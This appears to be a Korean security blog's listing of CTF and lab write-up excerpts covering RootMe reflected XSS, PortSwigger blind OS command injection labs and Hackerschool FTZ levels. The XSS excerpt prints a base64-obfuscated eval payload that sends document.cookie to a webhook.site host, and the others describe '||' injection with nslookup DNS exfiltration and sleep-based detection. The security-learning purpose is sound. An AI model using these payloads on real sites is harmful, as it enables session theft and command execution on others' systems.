반응형

문제 풀이 10

RootMe - XSS - Reflected WriteUp

문제 풀이' 삽입시 a태그 속성 escape 가능 cookie 전송하는 코드를 base64로 인코딩location.href="https://webhook.site/a0a45cf9-b23f-44e7-a80c-0744cad0a729?a=".concat(document.cookie) base64 디코딩 후 eval 함수를 사용할 경우 cookie 전송 자바스크립트 실행eval(atob("bG9jYXRpb24uaHJlZj0iaHR0cHM6Ly93ZWJob29rLnNpdGUvYTBhNDVjZjktYjIzZi00NGU3LWE4MGMtMDc0NGNhZDBhNzI5P2E9Ii5jb25jYXQoZG9jdW1lbnQuY29va2llKQ==")) 해당 url 접근시 cookie를 포함하여 location 리다이렉트되어 쿠키..

WEB hacking/rootme 2025.02.20

Lab: Blind OS command injection with out-of-band data exfiltration 문제 풀이(WriteUp)

문제 설명DNS 쿼리를 통해 whoami 결과 확인문제 풀이문제 접속 후 Submit feedback 접근 피드백 양식에 맞게 작성 후 요청 피드백 요청 시 email 파라미터에 || 추가 후 Command 삽입nslookup `whoami`.주소 를 통해 whoami의 결과 값을 포함하여 DNS 질의 도메인 이름 앞부분에 whoami 결과가 담겨져서 요청이 오게 됨

Lab: Blind OS command injection with out-of-band interaction 문제 풀이(WriteUp)

문제 설명Command Injeciton을 통해 Burp Collaborator에 DNS 조회문제 풀이문제 접속 후 Submit feedback 접근 피드백 양식에 맞춰 작성 후 요청 피드백 요청 시 email 파라미터에 || 후 Command 명령어를 삽입하여 DNS 질의DNS 질의시 test. 추가하여 앞에 데이터를 전송할 수 있음 burp Collaborator 확인 시 요청 응답 성공 확인

Lab: Blind OS command injection with output redirection 문제 풀이(WriteUp)

문제 설명/var/www/images/ 경로에 쓰기가 가능하며, whoami 명령어의 결과를 확인해야함문제 풀이문제 웹 사이트 접근 후 Submit feedback 클릭 피드백 양식에 맞게 작성 후 피드백 요청 피드백 요청시 응답에 아무런 결과도 없음 email 파라미터에 '(싱글쿼터) 삽입 시 500에러 발생 || 뒤에 Command 명령어 삽입 후 200 OK 응답 확인 이미지 경로 확인 후 접근 이미지 경로에서 filename 파라미터를 test로 변경하여 접속이 성공되었고, burp에서 Command 명령어가 실행된 것을 확인할 수 있음 burp로 확인 시 test 응답 결과 확인 가능 whoami 명령어를 리다이렉트 시켜 /var/www/images/whoami.txt 파일로 저장 whoami...

Lab: Blind OS command injection with time delays 문제 풀이(WriteUp)

문제 설명 Blind OS Command Injection을 통해 명령어를 실행하여 10초 지연하면 문제 해결 문제 풀이문제 접속 화면 피드백 작성 후 요청 피드백 요청 패킷 확인시 응답 값에 아무런 값도 반환되지 않음 email 파라미터에 '(싱글쿼터) 삽입 시 500 에러 발생 email 파라미터에 || 를 통해 sleep 명령어 삽입 시 명령어 작동sleep 1 명령어를 사용하여 1초 지연 sleep 5 명령어를 사용하여 5초 지연하여 문제 해결

Lab: OS command injection, simple case 문제 풀이(WriteUp)

문제 설명OS Command Injection을 통해 whoami 명령어를 사용하면 문제 해결 가능 문제 풀이문제 접속 화면 메인 페이지에서 View details 접속 후 재고 확인 시 남은 재고 출력 재고확인 요청 패킷에서 productId, storeId 파라미터 요청 파라미터에 '(싱글 쿼터) 삽입 시 에러 발생, 에러를 통해 사용자의 입력 값이 Command 명령어에 사용됨을 확인 storeId 파라미터에 ;ls; 명령어를 사용하여 추가적인 Command 공격 사용, 그 결과 응답 값에 ls 명령어의 결과가 반환됨 cat 명령어를 통해 stockreport.sh 파일을 확인한 결과 $1, $2를 통해 2개의 인자를 받고 있음$1은 productId, $2는 storeId임을 추측 가능 인자를 받..

[Hackerschool FTZ] - level 7 문제

문제 내용 /bin/level7 명령을 실행하면 패스워드 입력을 요청한다라고 나와있고 1~4까지 힌트가 있는것같다. /bin/level7 을 실행하니 패스워드 입력창이 나와서 아무 값이나 넣었더니 무슨 부호가 나온다. 부호 : --_--_- --____- ---_-__ --__-_- 2진수를 10진수로 바꿀수 있냐는 힌트에 1과 0으로 치환을 하면될것같다고 생각이 들었다.치환을 하면 1101101 1100001 1110100 1100101이 나온다.16진수로 표현을 하면 6D 61 74 65 가 된다.아스키 코트로 문자로 변환하면 m a t e가 나오므로 패스워드는 mate임을 유추할 수 있다. 패스워드는 mate를 입력하였더니 다음 레벨의 password가 나왔다. level8 password brea..

[Hackerschool FTZ] - level 6 문제

문제 내용 힌트에 인포샵 bbs의 텔넷 접속 메뉴에서 많이 사용되던 해킹기법이라고 나오고있다. 일단 enter를 눌러본다. 접속하고 싶은 bbs를 선택하라고 창이 뜬다. 1번을 한번 눌러보겠다. 입력을하니 아무것도 일어나지 않는다. 뭐지 싶어서 아까 힌트의 내용을 검색해 보았다. 인포샵 bbs란 인포샵 bbs는 옛날에 이용되던 사설 전자게시판이라고 한다. 사용자에게 주소를 입력받고 ping테스트 후 주소가 활성화 되어있으면 해당 주소에 연결해준다. 인포샵 bbs는 초기 접속화면에서 컨트롤+c를 누르면 바로 쉘이 떨어진다는 취약점을 가지고있다. 이를 바탕으로 초기 접속화면에서 컨트롤+c를 눌러서 쉘을 획득해보도록 하겠다. 초기 접속화면에서 컨트롤+c를 눌렀더니 쉘에 접근하였고 password파일을 읽어보니..

반응형